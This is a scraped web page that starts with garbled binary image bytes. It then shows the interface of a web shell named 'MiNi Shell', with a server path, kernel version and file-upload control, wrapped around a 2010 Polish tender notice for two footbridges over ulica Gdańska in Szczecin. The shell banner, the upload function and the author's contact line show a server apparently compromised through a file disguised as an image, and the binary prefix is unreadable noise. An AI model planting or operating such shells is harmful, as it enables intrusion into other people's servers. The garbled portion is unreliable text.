JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100811/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100811/245764-N-2010.html

<p class="kh_header"><b>Szczecin: Budowa kładek dla pieszych nad ulicą Gdańską w Szczecinie w ciągu drogi krajowej nr 10: 
- kładka dla pieszych w rejonie Basenu Górniczego,
- kładka dla pieszych przy ul. Merkatora.</b><br>
<b>Numer ogłoszenia: 245764 - 2010; data zamieszczenia: 11.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Szczecin - Zarząd Dróg i Transportu Miejskiego , ul. Klonowica 5, 71-241 Szczecin, woj. zachodniopomorskie, tel. 091 4800444,4800434, faks 091 4393003, 4800453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zditm.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kładek dla pieszych nad ulicą Gdańską w Szczecinie w ciągu drogi krajowej nr 10: 
- kładka dla pieszych w rejonie Basenu Górniczego,
- kładka dla pieszych przy ul. Merkatora..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach przedmiotu zamówienia ma zostać wykonana: 
I.   Budowa kładki dla pieszych ( Basen Górniczy) - nad drogą krajową nr 10, która 
     obejmuje wykonanie następujących prac:
1.  Budowa kładki dla pieszych wraz z klatkami schodowymi i windami.
     Dane techniczne:
     - Konstrukcja nośna : płyta zespolona  beton- stal, oparta na żelbetowych 
       filarach posadowionych na palach. 
     - Nawierzchnia płyty kładki - epoksydowa, przeciwpoślizgowa.
     - Ilość przęseł : 4
     - Całkowita długość obiektu: Lc=107,27 m
     - Całkowita szerokość ustroju niosącego: B=4,56 m
2.  Przebudowa sieci gazowej średniego ciśnienia, kolidującej z filarem.
3.  Budowa kanalizacji deszczowej odwadniającej kładkę oraz przebudowa
     istniejących sieci kanalizacji deszczowej kolidujących z kładką.
4.  Przebudowa sieci wodociągowych
5.  Budowa sieci elektrycznej dla potrzeb własnych kładki.
6.  Przełożenie i zabezpieczenie mechaniczne kabli energetycznych kolidujących z
     kładką.
7.  Budowa instalacji oświetleniowej kładki.
8.  Demontaże zbędnej instalacji sygnalizacyjnej.
9.  Zabezpieczenie trakcji tramwajowej na skrzyżowaniu z kładką.
10. Roboty drogowe, bariery, wygrodzenia, murki oporowe
 
II.  Budowa kładki dla pieszych (Merkatora) - nad drogą krajową nr 10, która
     obejmuje wykonanie następujących prac:
1.   Budowa kładki dla pieszych wraz z klatkami schodowymi i windami.
      Dane techniczne:
      - Konstrukcja nośna : płyta zespolona  beton- stal, oparta na żelbetowych
        filarach posadowionych na palach. 
      - Nawierzchnia płyty kładki - epoksydowa, przeciwpoślizgowa.
      - Ilość przęseł : 2
      - Całkowita długość obiektu: Lc=55,65 m
      - Całkowita szerokość ustroju niosącego: B=4,56 m
2.   Przebudowa sieci gazowej średniego ciśnienia, kolidującej z filarem.
3.   Budowa kanalizacji deszczowej odwadniającej kładkę.
4.   Przebudowa sieci wodociągowych.
5.   Budowa sieci elektrycznej dla potrzeb własnych kładki.
6.   Przełożenie i zabezpieczenie mechaniczne kabli energetycznych kolidujących z
      kładką.
7.   Budowa instalacji oświetleniowej kładki.
8.   Demontaże zbędnej instalacji sygnalizacyjnej.
9.   Zabezpieczenie trakcji tramwajowej na skrzyżowaniu z kładką.
10.  Roboty drogowe, bariery, wygrodzenia, murki oporowe.
11.  Przebudowa sieci teletechnicznej.

Wymagany termin wykonania zamówienia -  8 miesięcy od dnia przekazania placu budowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy. Zamówienie uzupełniające może zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego o wartości nie przekraczającej 20% zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.13-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.   Zamawiający żąda wniesienia wadium w kwocie 100.000,00 zł (słownie: sto
      tysięcy złotych).
2.   Wadium może być wniesione w jednej lub kilku formach przewidzianych art. 45
      ust. 6 ustawy, tj.
a)   pieniądzu,
b)   poręczeniach bankowych lub poręczeniach spółdzielczej kasy
      oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze
      poręczeniem pieniężnym,
c)   gwarancjach bankowych,
d)   gwarancjach ubezpieczeniowych,
e)   poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust 5 pkt
      2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
      Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.).
3.   Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy
      Zamawiającego ZDiTM w banku PEKAO S.A. I Oddział w Szczecinie nr
      83 1240 3813 1111 0000 4384 4416 z dopiskiem: przetarg na Budowę kładek
      dla pieszych nad ulicą Gdańską w Szczecinie w ciągu drogi krajowej nr 10: 
      kładka dla pieszych w rejonie Basenu Górniczego, kładka dla pieszych przy ul.
      Merkatora. 
      W przypadku wniesienia wadium w pieniądzu za moment wniesienia wadium
      uznaje się moment uznania rachunku Zamawiającego.
4.   W przypadku wniesienia wadium w innej formie niż pieniądz, oryginał dokumentu
      potwierdzającego wniesienie wadium należy złożyć w osobnej kopercie wraz z
      ofertą.
5.   Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia
      27.08.2010r. do godz. 11:00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie przez wykonawców, że wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty budowlanej obejmującej budowę lub przebudowę kładki dla pieszych o długości nie mniejszej niż 25 m lub innego obiektu mostowego o długości obiektu nie mniejszej niż 25 m.
Przez obiekt mostowy Zamawiający rozumie obiekt, o którym mowa w art. 4 pkt 13) ustawy z dnia 21 marca 1985 r. o drogach publicznych (tekst jedn. Dz.U. z 2007 r. Nr 19, poz. 115 z późn. zm.). W świetle powyższego przepisu przez obiekt mostowy należy rozumieć budowlę przeznaczoną do przeprowadzenia drogi, samodzielnego ciągu pieszego lub pieszo-rowerowego, szlaku wędrówek zwierząt dziko żyjących lub innego rodzaju komunikacji nad przeszkodą terenową, w szczególności: most, wiadukt, estakadę, kładkę.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie przez wykonawców, że:
1) dysponują co najmniej 1 osobą na stanowisko Kierownika budowy, która posiada
    wykształcenie wyższe techniczne - inżynier, uprawnienia budowlane do
    kierowania robotami budowlanymi w specjalności mostowej bez ograniczeń  (lub
    odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na
    podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania
    robotami budowlanymi co najmniej w zakresie budowy mostów) oraz
    doświadczenie w kierowaniu co najmniej jedną budową obejmującą budowę lub
    przebudowę obiektu mostowego w rozumieniu art. 4 pkt 13) ustawy z dnia 21
    marca 1985 r. o drogach publicznych (tekst jedn. Dz. U. z 2007 r. Nr 19, poz.
    115 z późn. zm.).
2) dysponują co najmniej 1 osobą na stanowisko Kierownika robót sanitarnych,
    która posiada minimum 5-letnie doświadczenie zawodowe w kierowaniu robotami
    budowlanymi oraz posiada uprawnienia do wykonywania samodzielnych funkcji w
    budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
    cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, lub
    odpowiadające im uprawnienia budowlane wydane na podstawie poprzednio
    obowiązujących przepisów.
3) dysponują co najmniej 1 osobą na stanowisko Kierownika robót elektrycznych,
    która posiada minimum 5-letnie doświadczenie zawodowe w kierowaniu
    robotami  budowlanymi oraz posiada uprawnienia do wykonywania
    samodzielnych funkcji w budownictwie o specjalności instalacyjnej w zakresie
    sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub
    odpowiadające im uprawnienia budowlane wydane na podstawie poprzednio
    obowiązujących przepisów.
4) dysponują co najmniej 1 osobą na stanowisko Kierownika robót drogowych,
    która posiada minimum 5-letnie doświadczenie zawodowe w kierowaniu robotami
    budowlanymi oraz posiada uprawnienia do wykonywania samodzielnych funkcji w
    budownictwie o specjalności drogowej lub odpowiadające im uprawnienia
    budowlane wydane na podstawie poprzednio obowiązujących przepisów.
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie przez wykonawców, że posiadają:
1)  środki finansowe lub zdolność kredytową w wysokości minimum
     1 000 000,00  zł (słownie: jeden milion złotych)
2)  ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej
     działalności związanej z przedmiotem zamówienia na kwotę co najmniej
     2 000 000,00 zł (słownie: dwa miliony złotych) wraz z opłaconą składką. 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez wykonawcę, na zasadzie SPEŁNIA/NIE SPEŁNIA.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  Formularz oferty cenowej stanowiący załącznik nr 1 do SIWZ wraz z Tabelą
     Elementów Rozliczeniowych (TER) stanowiącą załącznik nr 1A do SIWZ.
2.  Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się
     o udzielenie zamówienia, jeżeli oferta jest składana przez  takich wykonawców.
3.  Pełnomocnictwo do złożenia oferty, o ile prawo do podpisania oferty nie wynika
     z innych dokumentów złożonych wraz z ofertą.
4.  Oświadczenie wg wzoru stanowiącego załącznik nr 1 do SIWZ wskazujące
     część zamówienia, której wykonanie wykonawca powierzy podwykonawcom
     (jeżeli wykonawca przewiduje udział podwykonawców).
5.   Dowód wniesienia wadium.
6.   Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez
     Zamawiającego obowiązany jest wykazać, że oferowane przez niego roboty
     budowlane spełniają wymagania określone przez Zamawiającego, poprzez
     przedstawienie opisów wskazujących parametry techniczne i jakościowe
     proponowanych rozwiązań równoważnych (w tym materiałów i urządzeń
     przewidzianych do wbudowania).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zmiana personelu kluczowego Wykonawcy:
     Na pisemny wniosek wykonawcy dopuszczalna jest zamiana personelu
     kluczowego wykonawcy. Wniosek winien wskazywać zakres zmiany oraz
     zawierać dokumenty potwierdzające spełnienie warunków udziału w
     postępowaniu odnoszące się do członka personelu kluczowego, którego
     dotyczy zmiana. Zmiana dopuszczalna jest wyłącznie  za zgodą
     Zamawiającego. 
2.  Zamiana terminu realizacji przedmiotu umowy:
     W uzasadnionych przypadkach, za zgodą zamawiającego dopuszcza się zmianę
     terminu realizacji przedmiotu zamówienia. Wydłużenie okresu realizacji
     przedmiotu zamówienia jest dopuszczalne o ile zachodzi co najmniej jedna z
     poniższych przesłanek:
     - w przypadku nieodpowiednich warunków atmosferycznych, w celu
     dotrzymania wymogów technologicznych Zamawiający dopuszcza przesunięcie
     terminu wykonania robót. Przesunięcie ww. terminu Zamawiający warunkuje
     złożeniem przez Wykonawcę stosownego wniosku oraz dokumentów
     wskazujących, że zachowanie wymogów technologicznych w danych
     warunkach atmosferycznych jest niemożliwe (informacja o stanie pogody z
     Biura Prognoz),
     - nastąpiło wstrzymanie wykonania prac na okres nie krótszy niż 28 dni z
     innych przyczyn niezależnych od wykonawcy,
     - nastąpiła konieczność wykonania prac dodatkowych których nie można było
     wcześniej przewidzieć i nie wynikają  one z opisu przedmiotu zamówienia, a
     wykonanie tych prac ma wpływ na termin wykonania robót wskazanych w
     opisie przedmiotu zamówienia,
     - na wniosek wykonawcy termin realizacji przedmiotu zamówienia może zostać
     skrócony. Wykonawcy z tytułu zmiany terminu wykonania przedmiotu
     zamówienia nie będzie przysługiwało dodatkowe wynagrodzenie, w tym
     wynagrodzenie za czas przestoju.
3.  Zmiana wartości umowy: 	
     - W przypadku urzędowej zmiany podatków lub opłat wynagrodzenie umowne
     ulega odpowiedniej zmianie. Zmiana wartości zostanie dokonana zgodnie ze
     znowelizowanym stanem prawnym. 
     - W przypadku zwiększenia lub zmniejszenia ilości jednostek obmiarowych
     określonych tabelą elementów rozliczeniowych w wyniku obmiaru
     powykonawczego, z zastrzeżeniem iż zmiana taka nie może przekroczyć 20%
     wartości wynagrodzenia umownego.
4.  Zmiany technologii wykonania elementów robót:
     - Na wniosek wykonawcy, za zgodą zamawiającego, w trakcie prowadzenia
     inwestycji, mogą być dokonywane zmiany technologii wykonania elementów
     robót. Dopuszcza się je tylko w przypadku gdy proponowane przez niego
     rozwiązanie jest równorzędne lub lepsze funkcjonalnie od tego jakie przewiduje
     projekt. W tym przypadku wykonawca przedstawia projekt zamienny
     zawierający opis proponowanych zmian wraz z rysunkami. Projekt taki wymaga
     akceptacji nadzoru autorskiego i zatwierdzenia do realizacji przez
     zarządzającego. 
     - W przypadku gdy z punktu widzenia zamawiającego zachodzi potrzeba zmiany
     rozwiązań technicznych nie przewidzianych w umowie, zamawiający sporządza
     protokół konieczności, a następnie dostarcza dokumentację projektową na te
     roboty wraz ze zleceniem ich wykonania. 
     - W przypadku gdy określone powyżej zmiany powodują wzrost kosztów
     inwestycji traktuje się je jako roboty dodatkowe i zamawiający musi udzielić
     zamówienia dodatkowego na ich wykonanie, w trybie wynikającym z art. 67 ust
     1 pkt 5 ustawy.
5.  Zmiana kolejności wykonania elementów robót:	
     Na pisemny wniosek oraz za zgodą zamawiającego dopuszcza się zmianę
     kolejności wykonania elementów robót. Wniosek o zmianę kolejności wykonania
     robót musi zawierać propozycję zmiany harmonogramu wykonywania elementów
     robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zditm.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg i Transportu Miejskiego, ul. S. Klonowica 5, 71-241 Szczecin, pok.  318, Wydruk siwz w cenie 20,00 PLN, Płatność: - w kasie zamawiającego (pok. 19  parter), - za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2010 godzina 11:00, miejsce: Zarząd Dróg i Transportu Miejskiego, ul. S. Klonowica 5, 71-241 Szczecin, sekretariat - pokój nr 314.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com